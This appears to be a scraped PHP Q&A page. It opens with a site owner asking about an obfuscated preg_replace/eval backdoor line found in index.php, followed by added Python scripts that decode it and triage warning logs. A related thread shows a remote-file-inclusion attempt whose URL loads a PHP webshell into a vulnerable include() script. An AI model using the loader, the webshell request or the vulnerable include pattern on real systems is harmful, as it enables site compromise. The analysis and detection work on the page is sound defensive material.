Did my site get hacked? - php

I was randomly browsing a site on one of our servers, and I found this bit of code as the second line on index.php:
#preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
When I run it, I get:
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
It looks like it's obfuscated to do something that it really shouldn't be doing. Can anyone explain to me how I can figure out what the intention was of this line of code? And whether or not my server was actually hacked?
What was the perpetrator trying to do? It is a site running NOAH CLASSIFIEDS script.

That is hexa-coded text. If you want to see the decoded version, then see this:
Decoded
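The line can be read without running it. As an added example (not part of the original question or answer), this Python script decodes the PHP `\xHH` and octal escapes in the three `preg_replace()` arguments quoted above and base64-decodes the subject; the function names are this example's own.

```python
import base64
import re

# The three preg_replace() arguments exactly as quoted in the question, kept
# as raw strings so the PHP escapes stay literal. Nothing is executed.
PATTERN = r"\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145"
REPLACEMENT = r"\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73"
SUBJECT = r"\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63"

# PHP double-quoted strings: \xHH (1-2 hex digits) and \NNN (1-3 octal digits).
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def php_unescape(text):
    """Decode hex and octal escapes in one pass; decoded output is not rescanned."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return _ESCAPE.sub(repl, text)


def analyse(pattern, replacement, subject):
    """Static report on one preg_replace() call (names are this example's own)."""
    pat, code, subj = (php_unescape(s) for s in (pattern, replacement, subject))
    modifiers = pat[pat.rindex(pat[0]) + 1:]   # text after the closing delimiter
    try:
        decoded = base64.b64decode(subj, validate=True).decode("latin-1")
    except ValueError:                          # subject is not valid base64
        decoded = None
    return {
        "pattern": pat,
        "evaluates_code": "e" in modifiers,     # /e: replacement is run as PHP
        "replacement": code,
        "subject": subj,
        "subject_decoded": decoded,
    }


if __name__ == "__main__":
    for key, value in analyse(PATTERN, REPLACEMENT, SUBJECT).items():
        print(f"{key}: {value}")
```

The decoded pattern carries the `e` modifier, so PHP evaluates the decoded replacement as code: it reads the file named by the base64 subject, base64-decodes its contents and passes them to `eval`. The decoded subject is the same hidden path under `lang/cache/` that appears in the `file()` warning in the question.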

Related

Warning: file_get_contents failed to open stream: Connection refused php

Today, after updating a piece of content on my WP website, I've got this error showing up (instead of some icon images):
Warning: file_get_contents(http://example.com/wp-content/uploads/2020/03/icon-linkedin.svg): failed to open stream: Connection refused in /home/user/mywebsite/htdocs/wp-content/themes/theabnet/front-page.php on line 28
This is the screenshot of the code generating the error:
https://i.stack.imgur.com/Al7A6.png
The weird thing is that this never happened before and the edit I made was not involving icons or things directly connected with that navigation area.
Any help? (No strong coding skills unfortunately).
Revert the changes and see if your website recovers.
You can try giving folder permission in your live server sometimes permission. If it is your own, try to re-register the domain (or) change the SVG icon link.
I think the domain name (mywebsite.com) of your requested SVG link is wrong. If it is your own, try to re-register domain (or) change SVG icon link.

fopen() failing to open and append file

PT 2...This is day 4 of still not figuring out this issue.
I am brand new to learning PHP. I keep receiving an error code when trying to run my code in Google Chrome. As seen here:
Warning: fopen(/var/www/html/orders.txt): failed to open stream: Permission denied in /var/www/html/class_projects/ch2/processorder.php on line 68
I have changed the permission on all of my files to r/w. I have run multiple terminal commands to change permissions. I think it's obvious at this point I am making a big mistake somewhere. I'm at a loss of where to even look at this point.
I tried re-running the page after this action in the terminal. I still receive the same error code. What is my next best step in approaching this issue? I'm sure it's something I'm overlooking. Thanks for taking a look.

RFI not working properly, how to open a shell?

When I am trying to backdoor a web page given to me to find a specific file, upon requesting a shell I am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.
The link I used is:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
The display when searching it was:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php looks like this:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
What is the issue? I am sort of stuck.
Should I create an HTTP server to push my shell instead? I've read something about this but I'm not sure what that entails.
Even a link to an article is appreciated.
I don't know what the PHP script looks like where you try to include the remote page, but it has to be something like:
$incfile = $_REQUEST["file"]; include($incfile.".php");
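Seen from the server side, the two `include()` warnings quoted in the question are the trace left in PHP's error output when a URL reaches `include()`. As an added example (not part of the thread), this Python script parses warning lines in that format and flags `include`/`require` calls whose target uses a stream wrapper, plus reads of dot-files like the one in the `file()` warning from the first question; the sample lines, tag names and wrapper list are constructed for the example.

```python
import re

# Constructed sample: warning lines modelled on the formats quoted on this
# page. Host and paths are placeholders, not values from the threads.
SAMPLE_LOG = """\
Warning: include(http://198.51.100.7/x.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: fopen(/var/www/html/orders.txt): failed to open stream: Permission denied in /var/www/html/processorder.php on line 68
Warning: file(/var/www/html/lang/cache/.placeholder): failed to open stream: No such file or directory in /var/www/html/index.php on line 2
"""

WARNING = re.compile(
    r"Warning: (?P<func>\w+)\((?P<target>[^)]*)\): failed to open stream: "
    r"(?P<reason>.+?) in (?P<script>\S+) on line (?P<line>\d+)")
INCLUDE_FUNCS = {"include", "include_once", "require", "require_once"}
# Assumed wrapper list for this example; extend it to match your PHP build.
WRAPPER = re.compile(r"^(?:https?|ftps?|php|phar|expect)://|^data:", re.I)


def triage(log_text):
    """Return (tag, function, target, script, line) for suspicious warnings."""
    findings = []
    for m in WARNING.finditer(log_text):
        func, target = m["func"], m["target"]
        if func in INCLUDE_FUNCS and WRAPPER.match(target):
            # Code inclusion pointed at a URL or stream wrapper.
            tag = "remote-include-attempt"
        elif target.rsplit("/", 1)[-1].startswith("."):
            # A script reading a hidden file, as in the first question.
            tag = "hidden-file-read"
        else:
            continue  # ordinary failures (permissions, typos) are not flagged
        findings.append((tag, func, target, m["script"], int(m["line"])))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```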

PHP - Joomla 3 site-defines.php disappear after some time

I am getting this message on my site, PHP Warning:
require_once() [function.require-once]: Unable to access /home/sddalmac/public_html/includes/defines.php in /home/sddalmac/public_html/index.php on line 28
After I restore the defines.php file, the site works fine for a few hours and then the file disappears again. The same goes for the user and the admin interface.
Server PHP version is: 5.3.29
Does anyone know a solution for this problem?
Yes, website is hacked. PHP exploit.
Reason: Known exploit = [Fingerprint Match] [PHP DarkLeech Exploit [P0990]]
Thanks to all.

simplexml_load_file() error

So I'm trying to implement a website which uses data stored in an XML file.
It works fine on my computer, but as soon as I try to upload it, I get the following error:
Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "..\lib\menu.xml" in /home/ogwareco/public_html/menu.php on line 2
And none of the data gets displayed on the screen. I've Googled this problem, but it's led nowhere. I've got no idea what to do here. I've even tried to set my permissions to 777 (bad idea, I know), to see if it was a permissions thing, but it's not.
It looks like you are using backslashes to refer to the file on a Linux machine. Change
..\lib\menu.xml
to
../lib/menu.xml
in your code.
